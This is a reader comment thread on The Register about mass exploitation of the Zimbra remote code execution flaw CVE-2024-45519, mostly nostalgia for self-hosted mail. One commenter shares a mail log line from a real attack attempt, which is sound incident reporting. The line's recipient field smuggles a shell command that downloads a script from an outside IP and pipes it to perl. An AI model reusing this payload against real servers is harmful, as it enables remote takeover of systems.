back to article 'Patch yesterday': Zimbra mail servers under siege through RCE vuln

"Patch yesterday" is the advice from infosec researchers as the latest critical vulnerability affecting Zimbra mail servers is now being mass-exploited. The remote code execution vulnerability (CVE-2024-45519) was disclosed on September 27, along with a proof of concept (PoC) exploit, and Proofpoint reports that attacks using …

  1. Gordon Shumway

    Zimbra4Shell!

    Who'd have thought the concept would become popular?

  2. firstnamebunchofnumbers

    Still going?

    Great to know zimbra is still going to be honest. I used to quite like running/using it, was a decent option for self-hosted e-mail in the days before hosted providers offering 50GB+ mailboxes.

    1. Anonymous Coward
      Anonymous Coward

      Re: Still going?

      Same here. Alas our organization switched to Microsoft years ago and it's generally been a shit show ever since.

  3. Kevin McMurtrie Silver badge

    I was wondering what this worked on

    Seen in my logs:

    NOQUEUE: reject: RCPT from RB61004.rapidns.com[43.240.65.221]: 554 5.7.1 Service unavailable; Client host [43.240.65.221] blocked using zen.spamhaus.org; Listed by CSS, see https://check.spamhaus.org/query/ip/43.240.65.221; from=<exploit@mail.domain.com> to=<"exploit$(bash -c 'wget -qO - http://108.179.211.43/foxx|perl')"@mail.domain.com> proto=ESMTP helo=<localhost>

    1. Yorick Hunt Silver badge

      Re: I was wondering what this worked on

      Quite a lengthy script there with copious comments in Portuguese (I'd guess Brazillian).

      Can't be arsed trying to analyse it on my 'phone, but you can be sure it's not a simple "Hellorld" trinket.

POST COMMENT House rules

Not a member of The Register? Create a new account here.

  • Enter your comment

  • Add an icon

Anonymous cowards cannot choose their icon

Other stories you might like